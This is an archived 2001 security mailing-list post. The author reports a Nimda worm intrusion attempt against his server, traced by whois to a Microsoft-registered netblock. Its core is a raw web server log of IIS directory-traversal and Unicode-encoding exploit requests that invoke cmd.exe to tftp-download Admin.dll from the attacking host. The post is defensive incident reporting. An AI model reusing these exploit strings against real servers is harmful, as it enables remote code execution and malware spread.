Microsoft's Early Xmas Present.

From: Jay D. Dyson (jdysonat_private)
Date: Fri Dec 28 2001 - 18:11:23 PST

  • Next message: mcoleman: "Re: Microsoft's Early Xmas Present."

    -----BEGIN PGP SIGNED MESSAGE-----
    
    Hi folks,
    
    	Normally I wouldn't be sending this out, but I figure folks need
    to be aware and wary, considering the origin of this intrusion attempt.
    
    	I received an early Xmas present from Microsoft.  No, I didn't get
    XP, nor did I get the latest Office software suite.
    
    	I got a Nimda intrusion attempt.
    
    	Early Bird[1] picked up on this intrusion attempt and immediately
    notified Microsoft.  I've yet to hear back from Microsoft as to why this
    attack from their network came to pass[2].
    
    	For those who are interested, here's the log excerpt. 
    
    208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
    
    $ whois -h whois.arin.net 208.229.100.126
    
    Microsoft Labs (NETBLK-UU-208-229-100-D1)
       One Microsoft Way
       Redmond, WA 98052
       US
    
       Netname: UU-208-229-100-D1
       Netblock: 208.229.100.0 - 208.229.101.255
    
       Coordinator:
          Steig, Rick  (RS8676-ARIN)  a-rickstat_private
          (425) 703-3061
    
       Record last updated on 03-Nov-1997.
       Database last updated on  27-Dec-2001 19:55:32 EDT.
    
    - -Jay
    
    1.	http://www.treachery.net/earlybird/
    2.	If anyone from Microsoft is reading this, I'd appreciate something
    	more pleasant next holiday season.  (FYI, the machine you hit ran
    	XP for only 15 seconds.  It now runs Linux.)
    
       (    (                                                        _______
       ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
     C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
      `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.2
    Comment: See http://www.treachery.net/~jdyson/ for current keys.
    
    iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
    1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
    BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
    uNDtpRKBcGs=
    =9DpW
    -----END PGP SIGNATURE-----
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 20:27:09 PST